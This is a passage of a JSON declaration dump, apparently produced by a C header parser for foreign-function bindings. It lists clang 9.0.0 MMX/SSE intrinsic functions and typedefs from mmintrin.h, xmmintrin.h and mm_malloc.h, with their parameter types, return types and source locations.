"parameter", "name": "__i1", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__i0", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_set_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1326:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__s3", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__s2", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__s1", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__s0", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_set_pi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1357:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__b7", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b6", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b5", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b4", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b3", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b2", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b1", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b0", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_set1_pi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1378:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__i", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_set1_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1397:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__w", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_set1_pi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1415:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__b", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_setr_pi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1436:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__i0", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__i1", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_setr_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1459:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__w0", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w1", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w2", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w3", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_setr_pi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1490:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__b0", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b1", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b2", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b3", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b4", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b5", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b6", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b7", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }], "return-type": { "tag": "__m64" } }, { "tag": "typedef", "ns": 0, "name": "__v4si", "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:15:13", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v4sf", "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:16:15", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__m128", "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:17:15", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__m128_u", "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:19:15", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v4su", "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:22:22", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "function", "name": "posix_memalign", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mm_malloc.h:19:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__memptr", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":void" } } } }, { "tag": "parameter", "name": "__alignment", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "__size", "type": { "tag": "size_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_malloc", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mm_malloc.h:32:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__size", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "__align", "type": { "tag": "size_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "_mm_free", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mm_malloc.h:55:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_add_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:50:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_add_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:70:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_sub_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:92:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_sub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:113:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mul_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:135:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mul_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:155:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_div_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:177:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_div_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:196:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_sqrt_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:214:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_sqrt_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:231:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_rcp_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:249:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_rcp_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:266:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_rsqrt_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:285:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_rsqrt_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:302:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_min_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:325:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_min_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:344:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_max_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:367:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_max_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:386:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_and_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:404:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_andnot_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:426:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_or_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:444:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_xor_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:463:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cmpeq_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:485:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cmpeq_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:503:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cmplt_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:526:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cmplt_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:545:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cmple_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:569:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cmple_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:588:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cmpgt_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:611:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cmpgt_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:632:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cmpge_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:656:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cmpge_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:677:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cmpneq_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:700:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cmpneq_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:719:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cmpnlt_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:743:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cmpnlt_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:763:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cmpnle_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:788:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cmpnle_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:808:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cmpngt_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:833:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cmpngt_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:855:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cmpnge_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:880:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cmpnge_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:902:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cmpord_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:927:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cmpord_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:947:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cmpunord_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:972:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cmpunord_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:992:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_comieq_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1016:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_comilt_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1041:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_comile_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1065:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_comigt_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1089:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_comige_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1113:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_comineq_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1137:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_ucomieq_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1161:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_ucomilt_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1185:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_ucomile_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1210:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_ucomigt_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1235:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_ucomige_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1260:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_ucomineq_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1284:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_cvtss_si32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1302:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_cvt_ss2si", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1320:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_cvtss_si64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1340:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm_cvtps_pi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1358:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_cvt_ps2pi", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1374:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_cvttss_si32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1393:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_cvtt_ss2si", "ns": 0, "location": 